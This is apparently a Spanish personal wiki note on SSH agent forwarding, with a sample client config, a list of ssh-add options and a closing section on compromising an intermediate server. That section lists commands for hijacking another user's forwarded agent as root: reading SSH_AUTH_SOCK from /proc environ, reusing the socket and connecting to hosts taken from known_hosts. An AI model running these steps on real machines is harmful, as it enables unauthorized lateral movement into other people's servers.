= agente SSH == ssh-agent (port forwarding) * [[https://deephacking.tech/ssh-agent-hijacking-linux/]] * {{:linux:ssh:pasted:20250527-054104.png?700}} * Host dmz HostName dmz User alice ForwardAgent yes * Acceso ordenador DMZ (intermedio):ssh dmz # ssh -i ~/.ssh/clave_privada -A user@host * Host internalserver HostName 192.168.10.30 User alice ProxyJump dmz ForwardAgent yes * Acceso ordenador interno a través del intermedio:ssh internalServer * Si**ForwardAgent** està deshabilitado no se puede. * verificar * == opciones * ''ssh-add '' : añade la clave indicada para su uso (si tiene contraseña, nos la pedirá al usar) * ''-t '' : duración de la identidad en el agente * ''ssh-add -K '' : añade permanentemente la clave para su uso * ''ssh-add -L'' : lista las claves públicas de las claves existentes * ''ssh-add -l'' : lista las claves * ''ssh-add -d '' : elimina la clave * ''-D'' : elimina todas las claves * ''ssh-add -x'' : bloquea agente * ''-X'' : desbloquea agente == comprometer el servidor intermedio * entrar como root * mirar usuarios del sistema * mirar si tienen procesos SSH abiertos:pstree -p | grep ssh * mirar variables del entorno del usuario:cat /proc//environ | tr '\0' '\n' | grep SSH_AUTH_SOCK * mirar a quien corresponde el socket (root): SSH_AUTH_SOCK=/tmp/ssh-XXXX41DN9o/agent.46200 ssh-add -l * mirar ordenadores remotos del usuario: cat /home//.ssh/known_hosts * probar la conexión con esos servidores:SSH_AUTH_SOCK=/tmp/ssh-XXXX41DN9o/agent.46200 ssh alice@internalserver